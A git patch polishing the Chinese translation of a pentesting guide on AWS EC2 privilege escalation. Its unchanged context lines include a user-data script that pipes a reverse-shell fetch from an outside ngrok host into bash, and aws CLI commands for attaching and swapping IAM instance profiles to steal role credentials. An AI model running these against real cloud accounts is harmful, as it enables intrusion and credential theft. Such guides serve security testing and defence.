From b9fd78752e7bc4b5402091a4fd120d3989b1d745 Mon Sep 17 00:00:00 2001 From: Translator Date: Thu, 6 Feb 2025 02:14:27 +0000 Subject: [PATCH] Translated ['src/pentesting-cloud/aws-security/aws-privilege-escalation/ --- .../aws-ec2-privesc.md | 18 +++++++++--------- 1 file changed, 9 insertions(+), 9 deletions(-) diff --git a/src/pentesting-cloud/aws-security/aws-privilege-escalation/aws-ec2-privesc.md b/src/pentesting-cloud/aws-security/aws-privilege-escalation/aws-ec2-privesc.md index 91c48f9de..be32bde76 100644 --- a/src/pentesting-cloud/aws-security/aws-privilege-escalation/aws-ec2-privesc.md +++ b/src/pentesting-cloud/aws-security/aws-privilege-escalation/aws-ec2-privesc.md @@ -16,7 +16,7 @@ - **通过 SSH 访问** -使用 **创建的** **ssh 密钥** (`--key-name`) 运行一个新实例,然后 ssh 进入它(如果您想创建一个新的,您可能需要拥有权限 `ec2:CreateKeyPair`)。 +使用 **创建的** **ssh 密钥** (`--key-name`) 运行一个新实例,然后 ssh 进入它(如果您想创建一个新的,您可能需要拥有 `ec2:CreateKeyPair` 权限)。 ```bash aws ec2 run-instances --image-id --instance-type t2.micro \ --iam-instance-profile Name= --key-name \ @@ -30,7 +30,7 @@ echo '#!/bin/bash curl https://reverse-shell.sh/4.tcp.ngrok.io:17031 | bash' > /tmp/rev.sh aws ec2 run-instances --image-id --instance-type t2.micro \ ---iam-instance-profile Name=E \ +--iam-instance-profile Name= \ --count 1 \ --user-data "file:///tmp/rev.sh" ``` @@ -44,7 +44,7 @@ aws ec2 run-instances --image-id --instance-type t2.micro \ #### 提升权限到 ECS -通过这组权限,您还可以 **创建一个 EC2 实例并将其注册到 ECS 集群中**。这样,ECS **服务** 将在您有访问权限的 **EC2 实例** 中 **运行**,然后您可以渗透这些服务(docker 容器)并 **窃取其附加的 ECS 角色**。 +通过这组权限,您还可以 **创建一个 EC2 实例并将其注册到 ECS 集群中**。这样,ECS **服务** 将在您有访问权限的 **EC2 实例** 内 **运行**,然后您可以渗透这些服务(docker 容器)并 **窃取其附加的 ECS 角色**。 ```bash aws ec2 run-instances \ --image-id ami-07fde2ae86109a2af \ @@ -80,7 +80,7 @@ aws iam remove-role-from-instance-profile --instance-profile-name --role- # Add role to instance profile aws iam add-role-to-instance-profile --instance-profile-name --role-name ``` -如果**实例配置文件有角色**且攻击者**无法移除它**,还有另一种变通方法。他可以**找到**一个**没有角色的实例配置文件**或**创建一个新的**(`iam:CreateInstanceProfile`),**将**该**角色**添加到该**实例配置文件**(如前所述),并**将实例配置文件**关联到一个被攻陷的**实例:** +如果**实例配置文件有角色**而攻击者**无法移除它**,还有另一种变通方法。他可以**找到**一个**没有角色的实例配置文件**或**创建一个新的**(`iam:CreateInstanceProfile`),**将角色添加**到该**实例配置文件**(如前所述),并**将实例配置文件**关联到一个被攻陷的**实例:** - 如果实例**没有任何实例**配置文件(`ec2:AssociateIamInstanceProfile`) ```bash @@ -92,7 +92,7 @@ aws ec2 associate-iam-instance-profile --iam-instance-profile Name= --ins 拥有这些权限后,可以更改与实例关联的实例配置文件,因此如果攻击者已经访问了一个实例,他将能够通过更改与之关联的配置文件来窃取更多实例配置文件角色的凭据。 -- 如果它 **有一个实例配置文件**,您可以 **移除** 实例配置文件 (`ec2:DisassociateIamInstanceProfile`) 并 **关联** 它。 +- 如果它 **有一个实例配置文件**,您可以 **移除** 实例配置文件 (`ec2:DisassociateIamInstanceProfile`) 并 **关联** 它 ```bash aws ec2 describe-iam-instance-profile-associations --filters Name=instance-id,Values=i-0d36d47ba15d7b4da aws ec2 disassociate-iam-instance-profile --association-id @@ -106,7 +106,7 @@ aws ec2 replace-iam-instance-profile-association --iam-instance-profile Name=